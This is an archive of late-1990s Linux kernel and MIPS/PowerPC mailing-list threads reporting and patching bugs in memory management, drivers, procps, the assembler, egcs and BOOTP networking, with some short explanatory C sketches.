+++ 53c7,8xx.c	Sat Dec  6 08:16:20 1997
@@ -3396,6 +3396,11 @@
     NCR53c7x0_write8(STEST3_REG_800, STEST3_800_TE);
 }
 
+static void private_kfree (void * addr)
+{
+	kfree(addr);
+}
+
 /*
  * Function static struct NCR53c7x0_cmd *allocate_cmd (Scsi_Cmnd *cmd)
  * 
@@ -3467,7 +3472,7 @@
 #ifdef LINUX_1_2
 	tmp->free = ((void (*)(void *, int)) kfree_s);
 #else
-	tmp->free = ((void (*)(void *, int)) kfree);
+	tmp->free = ((void (*)(void *, int)) private_kfree);
 #endif
 	save_flags (flags);
 	cli();
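
Why a wrapper is needed can be shown with a small userland sketch.  The
names traced_free, my_free, private_free and struct cmd are made up for
illustration and are not the kernel's; the only assumption carried over
is that kfree() has become a function-like macro, so there is no longer
a plain function whose address can be stored in a callback field.

```c
#include <stdlib.h>

/* Hypothetical stand-in for a leak-tracing free routine. */
static int traced_frees;

static void traced_free(void *p, const char *file, int line)
{
	(void)file;
	(void)line;
	traced_frees++;
	free(p);
}

/* Like kfree() after the change, my_free is a macro, not a function. */
#define my_free(p) traced_free((p), __FILE__, __LINE__)

/* A real function with an address; it simply forwards to the macro. */
static void private_free(void *p)
{
	my_free(p);
}

/* Code that stores a "free" callback needs a function pointer. */
struct cmd {
	void *buf;
	void (*free_fn)(void *);
};

/* Release the buffer through the callback; returns the running free count. */
static int release_cmd(struct cmd *c)
{
	c->free_fn(c->buf);
	c->buf = NULL;
	return traced_frees;
}
```

Storing private_free in free_fn works because it is an ordinary
function; writing my_free there would not compile, since the macro is
only expanded when it is followed by an argument list.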

^ permalink raw reply	[relevance 64%]

* BIG FAT BUG with free_memory_available()
@ 1998-03-23 19:08 64% Rik van Riel
  0 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1998-03-23 19:08 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

Hi Linus,

it seems like I ran into some big fat bug with
the free_memory_available() test in kswapd.

My system turned into a swap loop with no change
in the amount of free memory and no 128k area free.
Probably this is because there's not one single
128k area without an unswappable page in it.

The only way I see around this is to disallow kernel
memory allocation and locked pages in a certain part
of physical memory, but maybe there's another way...

grtz,

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* free_memory_available() bug in pre-91-1
@ 1998-03-24 23:03 64% H.H.vanRiel
  1998-03-25 23:40 64% ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: H.H.vanRiel @ 1998-03-24 23:03 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

Hi Linus,

I've just found a bug in free_memory_available() as
implemented in pre-91-1...
It reacts the same on finding _no_ free item on a list
as it reacts on _multiple_ free items on the list.
So it'll return the same value regardless of whether
there is lots of free memory or there's no free memory...
(notice the 'break;' at two places...)

	do {
		list--;
		/* Empty list? Bad - we need more memory */
		if (list->next == memory_head(list))
			break;
		/* One item on the list? Look further */
		if (list->next->next == memory_head(list))
			continue;
		/* More than one item? We're ok */
		break;
	} while (--nr >= 0);
	spin_unlock_irqrestore(&page_alloc_lock, flags);
	return nr + 1;
}
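
The effect can be reproduced with a simplified userland model of the
loop above.  This is only a sketch: the array of per-list counts, the
function name and the starting value of nr are assumptions made for
illustration, and the real code walks linked lists under a spinlock.

```c
/*
 * counts[i] is the number of free blocks on list i, nlists is the
 * number of lists.  The caller is assumed to pass nr + 1 <= nlists.
 */
static int model_free_memory_available(const int *counts, int nlists, int nr)
{
	const int *list = counts + nlists;

	do {
		list--;
		/* Empty list? Bad - we need more memory */
		if (*list == 0)
			break;
		/* One item on the list? Look further */
		if (*list == 1)
			continue;
		/* More than one item? We're ok */
		break;
	} while (--nr >= 0);
	return nr + 1;
}
```

With nr = 2, a top list holding no blocks and a top list holding
several blocks both leave the loop on the first pass with nr untouched,
so the caller sees the same return value in both cases.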

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* Re: free_memory_available() bug in pre-91-1
  1998-03-24 23:03 64% free_memory_available() bug in pre-91-1 H.H.vanRiel
@ 1998-03-25 23:40 64% ` Linus Torvalds
  1998-03-26  9:08 64%   ` Rik van Riel
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1998-03-25 23:40 UTC (permalink / raw)
  To: H.H.vanRiel; +Cc: linux-mm



On Wed, 25 Mar 1998, H.H.vanRiel wrote:
> 
> I've just found a bug in free_memory_available() as
> implemented in pre-91-1...

Ugh, yes. How about pre-91-2, which I just put out? It has more of the
code the way I _think_ it should be, and it should try a lot harder to not
hog the CPU with kswapd. 

On a 512MB machine, the "tries" variable easily defaulted to try to page
out 8192 pages at a time, which was what we in the business call "Bad For
Interactive Use" (TM). The new one tries to throw out much fewer pages,
and is happier about being called more often - so kswapd really should be
more of a "background" thing rather than quite easily becoming
foregrounded.

All of this is completely untested in real life, but has gone through the
very strict "Looks Ok To Me" bs-filter. Thus it is obviously perfect and
can have no bugs. As such everybody should immediately upgrade and be
happy forever after. 

		Linus

^ permalink raw reply	[relevance 64%]

* Re: free_memory_available() bug in pre-91-1
  1998-03-25 23:40 64% ` Linus Torvalds
@ 1998-03-26  9:08 64%   ` Rik van Riel
  0 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1998-03-26  9:08 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-mm

On Wed, 25 Mar 1998, Linus Torvalds wrote:

> On Wed, 25 Mar 1998, H.H.vanRiel wrote:
> > 
> > I've just found a bug in free_memory_available() as
> > implemented in pre-91-1...
> 
> Ugh, yes. How about pre-91-2, which I just put out? It has more of the
> code the way I _think_ it should be, and it should try a lot harder to not
> hog the CPU with kswapd. 

Actually, I was referring to the fact that free_memory_available()
returns 3 when there's not a single 128k area available...
In that case, it should return 2.

But I'll try pre-91-2.

Rik.
+-------------------------------------------+--------------------------+
| Linux: - LinuxHQ MM-patches page          | Scouting       webmaster |
|        - kswapd ask-him & complain-to guy | Vries    cubscout leader |
|     http://www.fys.ruu.nl/~riel/          | <H.H.vanRiel@fys.ruu.nl> |
+-------------------------------------------+--------------------------+

^ permalink raw reply	[relevance 64%]

* bug
  @ 1998-04-04 16:30 64% ` Ulf Carlsson
  1998-04-04 15:59 64%   ` bug ralf
  0 siblings, 1 reply; 200+ results
From: Ulf Carlsson @ 1998-04-04 16:30 UTC (permalink / raw)
  To: ralf; +Cc: linux

How's it going with the bug?

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: bug
  1998-04-04 16:30 64% ` bug Ulf Carlsson
@ 1998-04-04 15:59 64%   ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-04-04 15:59 UTC (permalink / raw)
  To: Ulf Carlsson; +Cc: linux

On Sat, Apr 04, 1998 at 06:30:15PM +0200, Ulf Carlsson wrote:

> How's it going with the bug?

EGCS is bootstrapping ...

   Ralf

^ permalink raw reply	[relevance 64%]

* Wrong 'w' and 'ps' (bug in procps?)
@ 1998-05-13 17:10 64% Stephan van Hienen
  1998-05-14  8:22 64% ` David S. Miller
  0 siblings, 1 reply; 200+ results
From: Stephan van Hienen @ 1998-05-13 17:10 UTC (permalink / raw)
  To: ultralinux

hi just installed 1.0.9
and now this 'bug' ?

:

[ddx@sun ddx]$ w
  6:07pm  up 16:51,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     tty9                       6:59am 11:06m  0.00s   ?     -
ddx      ttyp0    ddx.ml.org        8:25am  1:56m  0.00s   ?     -
ddx      ttyp1    ddx.ml.org        6:07pm 26.00s  0.00s   ?     -
ddx      ttyp2    ddx.ml.org        6:07pm  0.00s  0.00s   ?     -
[ddx@sun ddx]$ ps
  PID TTY STAT TIME COMMAND
  655  ?  S    0:00 /bin/login -h ddx.ml.org -p
  656  ?  S    0:00 -bash
  667  ?  S    0:05 BitchX
 1127  ?  S    0:00 login -p -h ddx.ml.org -f ddx
 1128  ?  S    0:00 -bash
 1147  ?  S    0:00 login -p -h ddx.ml.org ddx
 1148  ?  S    0:00 -bash
 1157  ?  R    0:00 ps                           

PCPU and the TTY are not logged ok i think

but :

[ddx@sun ddx]$ who
root     tty9     May 13 06:59
ddx      ttyp0    May 13 08:25 (ddx.ml.org)
ddx      ttyp1    May 13 18:07 (ddx.ml.org)
ddx      ttyp2    May 13 18:07 (ddx.ml.org)     

gives it ok

^ permalink raw reply	[relevance 64%]

* Re: Wrong 'w' and 'ps' (bug in procps?)
  1998-05-13 17:10 64% Wrong 'w' and 'ps' (bug in procps?) Stephan van Hienen
@ 1998-05-14  8:22 64% ` David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1998-05-14  8:22 UTC (permalink / raw)
  To: ultralinux

   Date: 	Wed, 13 May 1998 19:10:41 +0200 (CEST)
   From: Stephan van Hienen <ddx@cable.a2000.nl>

   hi just installed 1.0.9
   and now this 'bug' ?

Thanks for pointing it out, it is fixed now.  If impatient, unpack the
procps SRPM from the UP-1.0.9 distribution, and perform the following
tasks to get fixed binaries:

1) Add the patch at the end of this mail to your procps tree
2) Rebuild
3) Install
4) Remove /etc/psdevtab
5) Run w, ps, or one of those procps programs once, this will
   rebuild /etc/psdevtab as a side effect

Once done, all the bugs you reported should be gone.

--- proc/devname.c.~1~	Wed May 13 23:26:07 1998
+++ proc/devname.c	Thu May 14 00:11:29 1998
@@ -12,9 +12,9 @@
 #include <unistd.h>
 #include <fcntl.h>
 
-#define __KERNEL__
+/* #define __KERNEL__ */
 #include <linux/kdev_t.h>
-#undef __KERNEL__
+/* #undef __KERNEL__ */
 
 #define DEVDIR		"/dev"
 #define DEVTAB		"psdevtab"
--- w.c.~1~	Fri Feb 13 08:42:38 1998
+++ w.c	Wed May 13 23:46:22 1998
@@ -83,7 +83,7 @@
     if (maxcmd < 3)
 	fprintf(stderr, "warning: screen width %d suboptimal.\n", win.ws_col);
 
-    procs = readproctab(PROC_FILLCMD|PROC_FILLTTY);
+    procs = readproctab(PROC_FILLCMD|PROC_FILLTTY|PROC_FILLUSR);
 
     if (header) {				/* print uptime and headers */
 	print_uptime();

^ permalink raw reply	[relevance 64%]

* Assembler bug
@ 1998-05-27  2:26 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-05-27  2:26 UTC (permalink / raw)
  To: linux-mips, linux, linux-mips; +Cc: hjl

I ran into an assembler bug which affects at least MIPS GAS 2.7 and 2.8.1.
An example which triggers the bug:

[ralf@lappi ralf]$ cat s.s 
        .globl  label1
label1:

        .org    0x1000

        .align  13		# align on 8kb boundary
[ralf@lappi /tmp]$ mips-linux-as -O3 -o s.o s.s
[ralf@lappi /tmp]$ mips-linux-objdump --syms s.o | grep label1
0000000000002000 g     O .text  0000000000000000 label1
[ralf@lappi /tmp]$ 

=> Label label1 gets assigned the wrong value 0x2000, not 0x0 as it
should.  Inserting a label definition after the .org pseudo op generates
correct code again.  I haven't tried this on non-MIPS GAS.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bug in do_munmap (fwd)
@ 1998-06-03 17:56 63% Rik van Riel
  1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
  0 siblings, 1 reply; 200+ results
From: Rik van Riel @ 1998-06-03 17:56 UTC (permalink / raw)
  To: Linux MM


---------- Forwarded message ----------
Date: Sun, 31 May 1998 21:40:14 +1700 (PDT)
From: Perry Harrington <pedward@sun4.apsoft.com>
To: Rik Van Riel <H.H.vanRiel@phys.uu.nl>
Subject: Bug in do_munmap

Rik,

 After the PTE bug post to bugtraq last week, I've been investigating
this.  There definitely appears to be a bug, where exactly, I'm unsure.
I've run the PTE killer under 2.1.95 and have confirmed that indeed
768 pages are allocated for the VMA.  munmap is called for each mapping,
however zap_page_range doesn't appear to be freeing all the pages.

 So, to summarize, I have confirmed that 768 pages are not freed, however
the code does call zap_page_range, which should free the PTEs associated
with that mapping.

I think I found the problem.  In zap_page_range:

	pgd_t * dir;
        unsigned long end = address + size;

        dir = pgd_offset(mm, address);
        flush_cache_range(mm, end - size, end);
        while (address < end) {
                zap_pmd_range(dir, address, end - address);
                address = (address + PGDIR_SIZE) & PGDIR_MASK;
                dir++;
        }

As you can see, dir is never freed.  If you look at zap_pmd_range, dir
is used as a lookup point.  dir is what's being left around after the
mmap.  The reason that this isn't a system wide memory leak is because
the pages are freed when the process is reaped. Does this sound right?

--Perry

-- 
Perry Harrington       Linux rules all OSes.    APSoft      ()
email: perry@apsoft.com 			Think Blue. /\

^ permalink raw reply	[relevance 63%]

* Re: Bug in do_munmap (fwd)
  1998-06-03 17:56 63% Bug in do_munmap (fwd) Rik van Riel
@ 1998-06-03 21:01 64% ` Benjamin C.R. LaHaise
  0 siblings, 0 replies; 200+ results
From: Benjamin C.R. LaHaise @ 1998-06-03 21:01 UTC (permalink / raw)
  To: Rik van Riel; +Cc: Perry Harrington, Linux MM

> I think I found the problem.  In zap_page_range:
...
> As you can see, dir is never freed.  If you look at zap_pmd_range, dir
> is used as a lookup point.  dir is what's being left around after the
> mmap.  The reason that this isn't a system wide memory leak is because
> the pages are freed when the process is reaped. Does this sound right?

Even if this particular aspect of it is fixed, the user can still bring
down the system by doing an anon mmap of 1 page at each 4MB boundary...
The correct fix is to have some sort of ulimit on the size of page tables,
or to make page tables swappable (uh-oh, that's a toughie fraught with
races).
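
A rough sketch of the arithmetic, assuming the classic i386 layout of
4KB pages, 1024-entry page tables and a 3GB user address space (these
figures and the names below are assumptions, not something stated in
this thread):

```c
#define MODEL_PAGE_SIZE     4096UL   /* assumed i386 page size */
#define MODEL_PTRS_PER_PTE  1024UL   /* assumed entries per page table */

/* Address range covered by one page table: 4MB under these assumptions. */
#define MODEL_PGDIR_SIZE    (MODEL_PAGE_SIZE * MODEL_PTRS_PER_PTE)

/*
 * Page-table pages pinned when a process touches one page in every
 * MODEL_PGDIR_SIZE-sized slice of its address space.
 */
static unsigned long page_tables_needed(unsigned long user_space_bytes)
{
	return user_space_bytes / MODEL_PGDIR_SIZE;
}
```

Under these assumptions page_tables_needed(3UL << 30) comes to 768
page-table pages per process, none of which can be swapped out.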

		-ben

^ permalink raw reply	[relevance 64%]

* Linux de4x5 driver bug?
@ 1998-06-15 22:44 54% Mark J. Steiglitz
  0 siblings, 0 replies; 200+ results
From: Mark J. Steiglitz @ 1998-06-15 22:44 UTC (permalink / raw)
  To: ultralinux

I am running UltraLinux 1.0.9 with kernel version 2.1.105 on a Sun Ultra 5.
The system contains a Znyx ZX346 4-port 10/100 ethernet card, which is
recognized by the de4x5 driver.

The first port of the card operates properly, but the other three ports either
fail to receive any packets, or exhibit extremely poor performance, with delays
of approximately 2 seconds just to receive a packet from the same ethernet.

Other minor problems which may be related are that "ifconfig -a" shows
incorrect values for various packet counters for any interface corresponding to
any Znyx ZX346 port, and that "netstat -i" reports "unknown interface" for any
interface.

The following messages are displayed on the console when doing a
modprobe de4x5 :

kernel: loading device 'eth1'...
kernel: eth1: DC21140 at 0xfffff9fe02001000 (PCI bus 3, device 4), h/w address 00:c0:95:e0:2e:28,
kernel: eth1: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608060 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth2'...
kernel: eth2: DC21140 at 0xfffff9fe02001080 (PCI bus 3, device 5), h/w address 00:c0:95:e0:2e:29,
kernel: eth2: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608070 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth3'...
kernel: eth3: DC21140 at 0xfffff9fe02001400 (PCI bus 3, device 6), h/w address 00:c0:95:e0:2e:2a,
kernel: eth3: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608080 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com
kernel: loading device 'eth4'...
kernel: eth4: DC21140 at 0xfffff9fe02001480 (PCI bus 3, device 7), h/w address 00:c0:95:e0:2e:2b,
kernel: eth4: Using generic MII device control. If the board doesn't operate, 
kernel: please mail the following dump to the author:
kernel: 
kernel: MII device address: 1
kernel: MII CR:  3000
kernel: MII SR:  7809
kernel: MII ID0: 15
kernel: MII ID1: f423
kernel: MII ANA: 1e1
kernel: MII ANC: 0
kernel: MII 16:  58
kernel: MII 17:  85e8
kernel: MII 18:  10
kernel: 
kernel:       and requires IRQ608090 (provided by PCI BIOS).
kernel: de4x5.c:V0.536 1998/3/5 davies@maniac.ultranet.com

--Mark

^ permalink raw reply	[relevance 54%]

* GCC bug
@ 1998-07-10 19:49 64% ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-07-10 19:49 UTC (permalink / raw)
  To: Alex deVries; +Cc: linux

Alex,

I fixed a stupid GCC bug.  As a result the packages f2c, flex and ncurses-4
will have to be rebuilt using the new GCC, or building new programs using
the libraries provided by these packages may not be possible any longer.

I'll send you an updated gcc package asap.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bug
@ 1998-09-04 18:51 64% Ulf Carlsson
  1998-09-04 21:25 64% ` Bug ralf
  0 siblings, 1 reply; 200+ results
From: Ulf Carlsson @ 1998-09-04 18:51 UTC (permalink / raw)
  To: Ralf Baechle; +Cc: linux

Hi,

I think you forgot a break in the middle of a switch statement, setting
order to 3 is pretty nonsense otherwise.
I compiled a new kernel with my patch, and I couldn't see any changes. The
VCED is probably handled correctly by the interrupt anyway.

patch applies to arch/mips/mm/init.c

--- init.c.org  Fri Sep  4 20:34:11 1998
+++ init.c      Fri Sep  4 20:45:40 1998
@@ -126,6 +126,7 @@
        case CPU_R4400SC:
        case CPU_R4400MC:
                order = 3;
+               break;
        default:
                order = 0;
        }

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: Bug
  1998-09-04 18:51 64% Bug Ulf Carlsson
@ 1998-09-04 21:25 64% ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-09-04 21:25 UTC (permalink / raw)
  To: Ulf Carlsson; +Cc: linux

On Fri, Sep 04, 1998 at 08:51:47PM +0200, Ulf Carlsson wrote:

> I think you forgot a break in the middle of a switch statement, setting
> order to 3 is pretty nonsense otherwise.
> I compiled a new kernel with my patch, and I couldn't see any changes. The
> VCED is probably handled correctly by the interrupt anyway.

Thanks, applied.  Note that this bug just resulted in somewhat reduced
performance at cost of 28kb more memory used.  On SC CPUs we use 8
different empty_zero_page pages to avoid VCED errors completely.
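
The fall-through and the 28kb figure can be illustrated with a small
standalone sketch.  The enum, the function names and the 4KB page size
are assumptions made for illustration; only the shape of the switch
follows the patch.

```c
enum cpu { CPU_R4400SC, CPU_R4400MC, CPU_OTHER };

/* Without the break, every case ends up running the default branch. */
static int order_without_break(enum cpu c)
{
	int order;

	switch (c) {
	case CPU_R4400SC:
	case CPU_R4400MC:
		order = 3;
		/* nothing stops execution here, so order is overwritten */
		/* fall through */
	default:
		order = 0;
	}
	return order;
}

/* With the break, SC/MC CPUs keep order 3. */
static int order_with_break(enum cpu c)
{
	int order;

	switch (c) {
	case CPU_R4400SC:
	case CPU_R4400MC:
		order = 3;
		break;
	default:
		order = 0;
	}
	return order;
}

/* Size of an allocation of 2^order pages, assuming 4KB pages. */
static unsigned long zero_area_bytes(int order)
{
	return 4096UL << order;
}
```

Order 3 means 8 pages, so with 4KB pages the difference between the two
variants is 32kb - 4kb = 28kb.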

  Ralf

^ permalink raw reply	[relevance 64%]

* Haifa scheduler bug in egcs 1.0.2
@ 1998-10-20 23:50 61% ralf
       [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
  0 siblings, 1 reply; 200+ results
From: ralf @ 1998-10-20 23:50 UTC (permalink / raw)
  To: linux, linux-mips, linux-mips

Hi all,

I've resolved a bug report from Ulf Carlsson, whose kernel compiles
died with:

gcc -D__KERNEL__ -I/home/ulfc/kernels/sgi-lin/linux/include -Wall \
-Wstrict-prototypes -O2 -fomit-frame-pointer -G 0 -mno-abicalls -fno-pic \
-mcpu=r4600 -mips2 -pipe    arch/mips/mm/r6000.c   -o arch/mips/mm/r6000

{standard input}: Assembler messages:
{standard input}:385: Warning: Unmatched %hi reloc
{standard input}:488: Internal error!
Assertion failure in tc_gen_reloc at ./config/tc-mips.c line 10203.
Please report this bug.
make: *** [arch/mips/mm/r6000] Error 1

This is caused by bad assembler code like:

[...]
        lui     $11,%hi(r6000_flush_cache_mm) # high
        lui     $12,%hi(r6000_flush_cache_range) # high
        lui     $17,%hi(r6000_flush_tlb_all) # high
        lui     $2,%hi(r6000_flush_tlb_mm) # high
        lui     $3,%hi(r6000_flush_tlb_range) # high
        lui     $4,%hi(r6000_flush_tlb_page) # high
        lui     $5,%hi(r6000_load_pgd) # high
        lui     $6,%hi(r6000_pgd_init) # high
        lui     $7,%hi(r6000_update_mmu_cache) # high
        lui     $8,%hi(r6000_show_regs) # high
        lui     $9,%hi(r6000_add_wired_entry) # high
        lui     $10,%hi(r6000_user_mode) # high
[...]

Relocating the code generated from this source later on will not be
possible for ld.  As knows this and dies ungracefully.

I was able to track this down to the Haifa scheduler which seems to be
incompatible with the -msplit-addresses used for kernel compiles.  For
now I suggest to recompile egcs without the Haifa scheduler.  Egcs by
default doesn't enable the Haifa scheduler and there is a reason why.

This egcs 1.0.2 bug is a platform independent bug.  Since egcs currently
does not support -msplit-addresses for PIC code, that is, all of userland,
this bug will only hit some low-level stuff.

Alex or somebody else, could you make an update to the egcs package
with the haifa scheduler disabled?  Thanks!

  Ralf

^ permalink raw reply	[relevance 61%]

* Re: Haifa scheduler bug in egcs 1.0.2
       [not found]     ` <199810210139.SAA22458@dm.cobaltmicro.com>
@ 1998-10-22  0:44 62%   ` ralf
  0 siblings, 0 replies; 200+ results
From: ralf @ 1998-10-22  0:44 UTC (permalink / raw)
  To: David S. Miller; +Cc: linux, linux-mips, linux-mips

On Tue, Oct 20, 1998 at 06:39:21PM -0700, David S. Miller wrote:

>    Relocating the code generated from this source later on will not be
>    possible for ld.  As knows this and dies ungracefully.
> 
> Then why is this a supposed bug in Haifa?  It looks to me there is a
> problem with how %hi relocs are associated with %lo ones in binutils.

It's not necessarily a bug in Haifa itself, but it becomes visible when
Haifa is enabled.  I haven't looked closely at the involved egcs code yet.

> The code you showed me looks perfectly legal.

For ECOFF and ELF, relocations against symbols are done in two parts, with
a hi16 relocation and a lo16 relocation.  Each relocation has only 16 bits of
space to store an addend and a carry may have to be propagated between
the two.  This means that in order for the linker to handle carries
correctly, it must be able to locate both the hi16 and the lo16 relocation.
Object files don't contain any information other than the order in the
relocation table that could be used to find the hi16 / lo16 relocs which
belong together.

The code I showed cannot be represented in a ELF or ECOFF object such that
the linker still knows which hi16 and which lo16 relocations are associated
with each other.  Therefore it is not possible for the linker to correctly
do the hi16 relocations.  Btw, all MIPS assemblers I know of will warn or
even error about that fragment.

The ABI is quite strict in that aspect, it wants one lo16 per hi16 for the
same symbol.  Binutils relax that by allowing an arbitrary number of hi16
and one lo16 for the same symbol.
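
The carry between the two halves can be sketched in a few lines of C.
The function names are made up for illustration; the arithmetic is the
usual split for a lui / addiu pair, where the low 16 bits are
sign-extended by the CPU, so the high half has to be adjusted whenever
the low half is 0x8000 or above.

```c
#include <stdint.h>

/* %hi: upper 16 bits, rounded up when the low half will act as negative. */
static uint16_t reloc_hi16(uint32_t addr)
{
	return (uint16_t)((addr + 0x8000u) >> 16);
}

/* %lo: lower 16 bits, interpreted as a signed 16-bit immediate. */
static int32_t reloc_lo16(uint32_t addr)
{
	int32_t lo = (int32_t)(addr & 0xffffu);

	if (lo >= 0x8000)
		lo -= 0x10000;
	return lo;
}

/* What "lui reg, %hi(sym); addiu reg, reg, %lo(sym)" ends up computing. */
static uint32_t rebuild(uint16_t hi, int32_t lo)
{
	return ((uint32_t)hi << 16) + (uint32_t)lo;
}
```

Because the value stored for the hi16 part depends on the low 16 bits of
the final address, the linker cannot fix up a hi16 relocation unless it
knows which lo16 relocation it belongs to.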

  Ralf

^ permalink raw reply	[relevance 62%]

* (fwd) was bug in haifa scheduler (or not)
@ 1998-10-22  6:26 64%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1998-10-22  6:26 UTC (permalink / raw)
  To: SGI/Linux mailing list

[just forwarding a bounce]

From: "David S. Miller" <davem@dm.cobaltmicro.com>
To: ralf@uni-koblenz.de
CC: linux@cthulhu.engr.sgi.com, linux-mips@fnet.fr,
        linux-mips@vger.rutgers.edu
In-reply-to: <19981022024408.A360@uni-koblenz.de> (ralf@uni-koblenz.de)
Subject: Re: Haifa scheduler bug in egcs 1.0.2
References: <19981021015047.G1830@uni-koblenz.de> <199810210139.SAA22458@dm.cobaltmicro.com> <19981022024408.A360@uni-koblenz.de>

   Date: Thu, 22 Oct 1998 02:44:08 +0200
   From: ralf@uni-koblenz.de

   The ABI is quite strict in that aspect, it wants one lo16 per hi16
   for the same symbol.  Binutils relax that by allowing an arbitrary
   number of hi16 and one lo16 for the same symbol.

I completely understand how hi16/lo16 relocations work on MIPS, but
thanks for reiterating it to me once more.

All you have shown me is a bug in the MIPS ABI, one of thousands.

Therefore, there is no reason binutils cannot handle this sanely, and
be fixed to do so.

Later,
David S. Miller
davem@dm.cobaltmicro.com

----- End of forwarded message from owner-linux@cthulhu -----

-- 
Peace, Ariel

^ permalink raw reply	[relevance 64%]

* floppy driver bug: write-protect
@ 1998-11-16  1:27 64% Brad Midgley
  1999-01-15  2:18 63% ` David A. Gatwood
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Brad Midgley @ 1998-11-16  1:27 UTC (permalink / raw)
  To: linuxppc-dev


is this a known bug?

on intel linux, if you try to mount a write-protected floppy disk
read-write, the mount succeeds but is demoted to read-only. 

the current pmac kernel will mount the disk read-write and will allow
"writes" to the disk. the writes even appear to succeed and the mounted
filesystem returns really strange results when you look at it (it's
caching the "writes" and everything seems normal until uncached data has
to be loaded from the disk!)

is it known how to query the drive for the write-protect status? does this
problem affect any other removable media?

brad


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* [BUG] arp replies with BOOTP (nfsroot)
@ 1998-12-02 20:36 64% Oren Laadan
  1998-12-03 16:20 62% ` [BUG] arp replies with BOOTP [more info] Oren Laadan
  0 siblings, 1 reply; 200+ results
From: Oren Laadan @ 1998-12-02 20:36 UTC (permalink / raw)
  To: linux-kernel, mj

Hi,

While trying to set up nfsroot with the BOOTP protocol, we discovered a
serious bug: incorrect ARP handling. [ Kernel:  2.1.129 ]

It appears that while the kernel is waiting for a reply to a BOOTP
request sent earlier, it mishandles ARP requests. In particular,
it replies to every "arp who-has THIS_IP" with "THIS_IP is MY_NIC_ADDR":
that is, it publishes its own NIC address as matching EVERY local IP.

Effectively, this means it operates as a NIC proxy (well, it doesn't
really do anything but reply to ARP requests...).
As a result, other machines in the network become confused, eventually
leading to serious networking problems.

We suspect the problem is in net/ipv4/ipconfig.c:c_bootp_route_lookup()
(hooked during initialization instead of the default route lookup
function).

Any hints ?

Oren.

__________________________________________________________________________
                         ______   ____   ___  ___  _  __                  \
MOSIX Development Group  )  )  )  )   ) (  '   )   \ /      Oren Laadan    \
 The Hebrew University  /  /  /  /   /   \    /     /   orenl@cs.huji.ac.il \
 of Jerusalem,  Israel (     (  (___(  ___) _(_  __/ \_______________________)

     http://www.mosix.cs.huji.ac.il     


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 64%]

* [BUG] arp replies with BOOTP [more info]
  1998-12-02 20:36 64% [BUG] arp replies with BOOTP (nfsroot) Oren Laadan
@ 1998-12-03 16:20 62% ` Oren Laadan
  0 siblings, 0 replies; 200+ results
From: Oren Laadan @ 1998-12-03 16:20 UTC (permalink / raw)
  To: linux-kernel, mj, Alan Cox

Hi,

> It appears that while the kernel is waiting for a reply to a BOOTP
> request sent earlier, it mishandles ARP requests. In particular,
> it replies to every "arp who-has THIS_IP" with "THIS_IP is MY_NIC_ADDR":
